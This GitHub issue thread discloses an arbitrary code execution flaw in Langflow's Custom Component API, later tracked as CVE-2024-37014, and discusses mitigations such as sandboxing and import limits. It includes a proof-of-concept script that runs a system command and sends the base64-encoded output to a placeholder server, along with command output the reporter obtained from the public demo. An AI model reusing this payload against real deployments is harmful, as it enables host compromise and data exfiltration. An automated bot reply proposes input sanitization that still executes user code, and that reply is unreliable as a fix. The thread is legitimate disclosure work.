[Security Issue] Code Execution against underlying host system in Custom Component

0xfatty commented 5 months ago

Quick note Langflow is a very interesting and useful framework for those who work with AI projects. Personally, it's a cool project to learn from. It seems the Custom Component feature was launched to support user-defined Python scripts that use the Langflow provided library. This is a great feature. However, upon reviewing its documentation in [1] and [2], it seems there is no mention of potential security issues. Hence, perhaps the following finding was likely not expected. [1] https://docs.langflow.org/components/custom [2] https://docs.langflow.org/guidelines/custom-component

Describe the bug The Custom Component feature allows users to provide their own Python scripts using the CustomComponent class provided by the Langflow library. This is excellent for local testing and experimentation. However, if the framework is hosted online, it creates a potential security issue where a bad actor can leverage the opportunity to provide arbitrary Python code and gain code execution ability against the hosting server.

Impacted API POST /api/v1/custom_component

Browser and Version

Browser: Tested on Chromium
Version: 125.0.6422.60 (Official Build) (arm64)

To Reproduce Steps to reproduce the behavior:

Create a new project
Using CustomComponent, within Component class, provide the following Python function

import subprocess
import base64
    def execute_and_send():
        # Execute arbitrary system command
        result = subprocess.run(['uname', '-a'], capture_output=True, text=True)
        if result.stderr:
            print("Error:", result.stderr)
            return

        # Base64 encode the output
        encoded_output = base64.b64encode(result.stdout.encode()).decode()

        # Make a GET request with the base64 string as a query parameter
        url = f"https://your_server/?data={encoded_output}"
        response = requests.get(url)

    execute_and_send()

By clicking on Check & Save, the /api/v1/custom_component API is invoked to process the provided Python script, which then leads to OS command execution. The output will be Base64 encoded and sent to a malicious server.

Screenshots

Additional context The vulnerability allows for arbitrary code execution by injecting malicious code through the Custom Component feature. This could lead to significant security risks, including data theft, unauthorized access, and potential disruption of services (especially when being hosted publicly)

dosubot[bot] commented 5 months ago

Hey @0xfatty, I'm here to help you with any bugs, questions, or contributions you have in mind. Let's get started!

To address the security vulnerability in the Custom Component feature of the Langflow framework that allows for arbitrary code execution when hosted online, you should implement input validation and sanitization. Additionally, you can leverage the existing structure of the Component class to ensure that the code provided is safe and does not contain malicious elements.

Here is an example of how you can modify the build method to include input validation and sanitization, while also utilizing the existing Component class structure:

import re
from langflow.custom import CustomComponent
from langflow.schema import Record
from langflow.custom.eval import eval_custom_component_code
from langflow.utils import validate

class Component(CustomComponent):
    display_name = "Custom Component"
    description = "Use as a template to create your own component."
    documentation: str = "http://docs.langflow.org/components/custom"
    icon = "custom_components"

    def build_config(self):
        return {"param": {"display_name": "Parameter"}}

    def build(self, param: str) -> Record:
        # Basic input validation to prevent arbitrary code execution
        if not isinstance(param, str):
            raise ValueError("Parameter must be a string")

        # Example of sanitizing input to remove potentially dangerous characters
        sanitized_param = re.sub(r'[^\w\s]', '', param)

        # Validate and execute the custom component code safely
        if not self.code:
            raise ComponentCodeNullError(
                status_code=400,
                detail={"error": self.ERROR_CODE_NULL, "traceback": ""},
            )

        if not self._function_entrypoint_name:
            raise ComponentFunctionEntrypointNameNullError(
                status_code=400,
                detail={
                    "error": self.ERROR_FUNCTION_ENTRYPOINT_NAME_NULL,
                    "traceback": "",
                },
            )

        custom_function = validate.create_function(self.code, self._function_entrypoint_name)
        result = custom_function(sanitized_param)

        return Record(data=result)

In this example:

The build method checks if the param is a string.
It sanitizes the input by removing any non-alphanumeric characters using a regular expression.
It validates and executes the custom component code safely by leveraging the existing Component class methods.

This approach helps mitigate the risk of arbitrary code execution by ensuring that the input is safe before processing it and by using the existing validation mechanisms provided by the Langflow framework ^[1]^[2].

#### Details

**About Dosu** This response is meant to be useful and save you time. It is **not meant to be a precise solution**, but rather a starting point for your own research. Help me be more useful! Please leave a 👍 if this is helpful and 👎 if it is irrelevant.

To continue the conversation, mention @dosu.

0xfatty commented 5 months ago

Thank you for your prompt response and suggestion to address the security vulnerability by implementing input validation and sanitization. However, I'd like to clarify that the core issue lies in the context of the entire Langflow framework being hosted publicly, rather than the safety of individual published components.

The vulnerability arises because the framework allows users to create and execute their custom components on a publicly accessible server. In this scenario, the risk is that a malicious user can upload a custom component containing arbitrary and potentially harmful code, which gets executed on the server.

Taking the online playground provided by Langflow at https://huggingface.co/spaces/Langflow/Langflow as an example. With the same attack vector, I was able to execute the OS commands against the underlying docker container.

Sample output

Linux r-langflow-langflow-6hjjdvt7-50f38-0g46r 5.10.205-195.807.amzn2.x86_64 #1 SMP Tue Jan 16 18:28:59 UTC 2024 x86_64 GNU/Linux

total 88
drwxr-xr-x 1 user user    18 May 17 20:40 .
drwxr-xr-x 1 user user    62 May 25 12:46 ..
drwxr-xr-x 8 user user   178 Apr 12 11:49 .git
-rw-r--r-- 1 user user  1477 Apr 12 11:49 .gitattributes
-rw-r--r-- 1 user user 73828 Apr 12 11:51 =0.6.12
-rw-r--r-- 1 user user   556 Apr 12 11:49 Dockerfile
-rw-r--r-- 1 user user  1209 Apr 12 11:49 README.md
drwxr-xr-x 2 user user    26 May 17 20:40 logs

YamonBot commented 5 months ago

We also anticipated encountering similar issues when implementing Whisper in Langflow, specifically when converting voice file inputs to Base64 within the component.

As you mentioned, if a malicious user gains access to the Langflow exposed to clients, they could potentially include custom components with such backdoor code. (Similar to the Hugging Face scenario you mentioned)

Given the recent pull request history showing an image output component, it seems likely that an input component field will be added soon. It would be ideal if file input and output handling were restricted solely to the input component level, preventing users from directly writing these operations in custom components. (Alternatively, Langflow could include a mechanism to directly validate the Base64 format.)

Additionally, I recently heard that the LF core team is refactoring using Casbin for RBAC. Fundamentally, beyond debug/build modes, Casbin's introduction will likely result in account-based API call control. This aspect should be emphasized in the manual to caution users accordingly. (At the product level, the example scenario you mentioned should be used to highlight the importance of disabling the AUTO LOGIN flag.)

Similarly, https://github.com/langflow-ai/langflow/pull/1747 I think the approach of calling exec-like code, in addition to embedding such backdoors in the flow, is also risky. What are your thoughts on this?

0xfatty commented 5 months ago

Thank you for your detailed response and for acknowledging the potential risks associated with the Custom Component feature. I appreciate the proactive measures you are considering, particularly the introduction of file input and output handling restrictions and the refactoring with Casbin for RBAC. Here are my thoughts on the points you raised:

File Input and Output Handling

Restricting file input and output operations to specific input components is a great step towards mitigating the risk of arbitrary code execution. By limiting these operations to controlled and validated components, you reduce the attack surface significantly. Incorporating mechanisms to directly validate the Base64 format at the component level is also a good way to ensure data integrity and security. However, Base64 output is just one of several ways for encoding. I do think it could be better if we have a mechanism to block outbound call by invoking this API.

Casbin for RBAC:

The refactoring to include Casbin for role-based access control (RBAC) is a positive move. Beyond debug/build modes, implementing account-based API call control will enhance security by ensuring that only authorized users can execute certain actions. Emphasizing this in the documentation, especially with a focus on disabling the AUTO LOGIN flag, will help users understand the importance of these security measures. Using real-world scenarios, such as the one mentioned, can effectively highlight potential risks and encourage best practices.

Exec-like Code Risks:

Allowing exec-like code in custom components poses significant security risks, as it provides a direct method for attackers to execute arbitrary commands. Even with input validation and sandboxing, the inherent risk of arbitrary code execution remains high. I recommend considering the following additional measures:

Script Execution Isolation: Use containerization (e.g., Docker) or sandboxing (e.g., Firejail) to isolate the execution environment of custom components, ensuring that any malicious code cannot impact the host system.
Code Auditing and Approval: Implement a code review and approval process for custom components. This can be automated to some extent, using static analysis tools to detect potentially harmful patterns before allowing execution. For example, discontinue support for invoking this API. Instead, it can be submitted for code review before it can be invoked by the REAL account owner.
Restricting Imports and Libraries: Limit the libraries and modules that can be imported in custom components. By providing a predefined list of safe libraries, you can prevent the use of potentially dangerous modules like subprocess or os.
Execution Time and Resource Limits: Set strict execution time and resource limits (e.g., memory, CPU usage) for custom components. This helps mitigate the risk of resource exhaustion attacks.

I appreciate the efforts being made to enhance Langflow's security and am available to provide further insights or assistance as needed.

0xfatty commented 5 months ago

@yamonkjd I just added a commit publishing Security policy page. https://github.com/langflow-ai/langflow/pull/2000 This is to publish a CVE tracking number for this issue. Hope you can review and approve and publish an advisory for this.

YamonBot commented 5 months ago

lol, We are contributor to Langflow, not a core member. I seem to have caused some confusion.

@ogabrielluiz Hey, could you please review this request?

0xfatty commented 5 months ago

CVE-2024-37014 has been assigned by MITRE to track this security issue.

carlosrcoelho commented 3 months ago

https://github.com/langflow-ai/langflow/issues/2908

langflow-ai / langflow